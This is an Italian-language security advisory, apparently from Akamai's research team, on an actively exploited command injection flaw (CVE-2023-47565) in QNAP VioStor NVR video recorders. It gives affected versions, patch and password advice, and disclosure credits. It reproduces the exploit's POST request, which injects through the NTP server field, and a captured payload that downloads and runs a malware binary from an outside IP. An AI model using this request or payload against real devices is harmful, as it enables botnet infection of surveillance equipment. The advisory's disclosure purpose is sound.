Vi serve il cloud computing? Iniziate subito

Vulnerabilità sfruttata attivamente nei dispositivi QNAP VioStor NVR: correzioni e patch disponibili

Akamai Wave Blue

scritto da

Chad Seaman e Larry Cashdollar

December 14, 2023

Chad Seaman headshot

scritto da

Chad Seaman

Chad Seaman è Principal Security Researcher e Team Lead del SIRT (Security Intelligence Response Team) di Akamai. Si definisce con orgoglio un "Internet Dumpster Diver" e si diverte a esaminare le anomalie rilevate. Chad ha iniziato la sua carriera come programmatore e, dopo le esperienze nel settore della sicurezza, dello sfruttamento e delle indagini forensi tramite le indagini sulle violazioni, la sicurezza è diventata rapidamente il suo lavoro preferito. Ora trascorre il suo tempo immerso in indagini su malware, reverse engineering, ricerca sulle vulnerabilità, attacchi DDoS e indagini sui crimini informatici. Gli piace far volare aeroplani, praticare fori sulla carta a distanza e passare il tempo in mezzo alla natura, preferibilmente nei boschi, su un sentiero, su una bici da cross..

Larry Cashdollar

scritto da

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

I sistemi tradizionali sono un terreno fertile per il rilevamento e lo sfruttamento di nuove vulnerabilità allo scopo di diffondere il malware.

Analisi riassuntiva

Cosa dovete sapere

Nell'ambito della nostra ricerca su InfectedSlurs, il team SIRT ha scoperto una vulnerabilità nei dispositivi QNAP VioStor NVR (Network Video Recorder), che viene attivamente sfruttata in rete. Il dispositivo NVR è una soluzione di videosorveglianza di rete ad alte performance per il monitoraggio di telecamere IP, che offre funzioni di registrazione video, riproduzione e accesso remoto ai dati. Alla vulnerabilità è stato assegnato l'ID CVE-2023-47565 con un punteggio CVSS v3 di 8,0.

La vulnerabilità consente ad un criminale autenticato di sferrare un attacco di inserimento di comandi del sistema operativo (OS Command Injection) con un payload trasmesso tramite una richiesta POST all'interfaccia di gestione. Nella sua configurazione attuale, vengono utilizzate le credenziali predefinite del dispositivo nei payload acquisiti.

Sono interessate le seguenti versioni del firmware QNAP VioStor NVR:

  • VioStor NVR: versioni 5.0.0 e versioni precedenti (versione 5.0.0 rilasciata il 21 giugno 2014)

QNAP ha interrotto il supporto per questi dispositivi, tuttavia, il fornitore consiglia di aggiornare il firmware VioStor sui dispositivi esistenti all'ultima versione disponibile. Questo problema è stato corretto con una patch, che, tuttavia, non è stata mai pubblicamente segnalata/divulgata. Inoltre, si consiglia agli utenti di cambiare le password predefinite sui loro dispositivi.

Infine, US-CERT ha pubblicato un documento consultivo.

Rilevamento di uno sfruttamento

Inizialmente, analizzando i payload dell'exploit durante la campagna InfectedSlurs, avevamo segnalato solo due vulnerabilità zero-day poiché il team non era riuscito a collegare efficacemente l'exploit che avevamo osservato con uno specifico dispositivo o produttore. Questo problema aveva reso difficile stabilire la classificazione zero-day dell'exploit.

Dopo un esame più approfondito di vari aspetti dell'exploit e dei payload, il SIRT ha identificato l'obiettivo della campagna nei dispositivi QNAP VioStor NVR, che rientrano nel profilo dei sistemi presi di mira dalla campagna poiché sono stati forniti con credenziali predefinite deboli (come si legge nei relativi manuali e come abbiamo osservato nell'exploit). Poiché si trattava di questo caso con le due iniziali vulnerabilità zero-day, i dispositivi infettati potevano facilitare la presenza di vulnerabilità OS Command Injection nelle impostazioni NTP sui dispositivi IoT (Internet of Things) e NVR.

Il team US-CERT, dopo aver ricevuto le nostre teorie, si è coordinato con il SIRT di Akamai e con QNAP per rivedere le prove raccolte e aiutare a confermare le teorie del SIRT. Infine, QNAP ha confermato che i payload hanno preso di mira i suoi dispositivi VioStor, che sono stati ritirati e a cui non viene più fornito il supporto, ma solo le versioni meno recenti (fino alla versione 5.0.0) del firmware rilasciato in precedenza dall'azienda.

La vulnerabilità è stata sfruttata effettuando una richiesta POST al percorso /cgi-bin/server/server.cgi . L'esecuzione di codice remoto (RCE) si verifica quando viene specificato l'argomento per SPECIFIC_SERVER (Figura 1).

  URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=

PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]

Figura 1. Tentativo di sfruttamento della vulnerabilità RCE tramite Command Injection

Un esempio del payload di infezione acquisito è illustrato nella Figura 2.

  wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86

Figura 2. Payload RCE acquisito

Le procedure di sicurezza di base sono fondamentali

Le procedure di base sono fondamentali. Queste osservazioni ancora una volta evidenziano l'importanza di seguire procedure di sicurezza di base, come cambiare le password predefinite sui dispositivi durante la configurazione iniziale. come anche di implementare protocolli proattivi che garantiscono una sicurezza ancora maggiore nel lungo termine, come aggiornare costantemente i sistemi per proteggerli da potenziali attacchi e controllare occasionalmente i sistemi/dispositivi, specialmente se si notano comportamenti insoliti.

Conclusione

Ancora una volta, la nostra implementazione di rete honeypot personalizzata ha fornito preziose informazioni sugli attacchi informatici, rivelando vulnerabilità in precedenza sconosciute. La presenza di credenziali predefinite e di sistemi connessi in rete obsoleti e di cui non viene più fornito il supporto ha rappresentato il percorso seguito dalle infezioni della botnet. I sistemi tradizionali sono un terreno fertile per il rilevamento e lo sfruttamento di nuove vulnerabilità allo scopo di diffondere il malware.

Questo risultato enfatizza l'importanza cruciale di migliorare la consapevolezza e la formazione sulle best practice da adottare per i dispositivi IoT, evidenziando i rischi associati per il consumatore medio; la necessità di consapevolezza si estende oltre gli utenti e si applica anche ai produttori di questi dispositivi. Una protezione e una manutenzione prolungata del software al momento della configurazione, come forzare il cambio delle password, sono fondamentali per mantenere la sicurezza dei sistemi.

Tenetevi al passo

L'Akamai Security Intelligence Group continuerà a monitorare minacce come queste e fornirà i relativi rapporti per aumentare la consapevolezza nei nostri clienti e nella comunità della sicurezza in generale. Per ulteriori ricerche, seguiteci su X(in precedenza, noto come Twitter) per tenervi aggiornati su ciò che stiamo osservando.

Il team SIRT di Akamai desidera ringraziare tutti in CISA, US- CERT e QNAP per la loro assistenza nel nostro processo di comunicazione, coordinamento, identificazione, mitigazione e divulgazione.



Akamai Wave Blue

scritto da

Chad Seaman e Larry Cashdollar

December 14, 2023

Chad Seaman headshot

scritto da

Chad Seaman

Chad Seaman è Principal Security Researcher e Team Lead del SIRT (Security Intelligence Response Team) di Akamai. Si definisce con orgoglio un "Internet Dumpster Diver" e si diverte a esaminare le anomalie rilevate. Chad ha iniziato la sua carriera come programmatore e, dopo le esperienze nel settore della sicurezza, dello sfruttamento e delle indagini forensi tramite le indagini sulle violazioni, la sicurezza è diventata rapidamente il suo lavoro preferito. Ora trascorre il suo tempo immerso in indagini su malware, reverse engineering, ricerca sulle vulnerabilità, attacchi DDoS e indagini sui crimini informatici. Gli piace far volare aeroplani, praticare fori sulla carta a distanza e passare il tempo in mezzo alla natura, preferibilmente nei boschi, su un sentiero, su una bici da cross..

Larry Cashdollar

scritto da

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.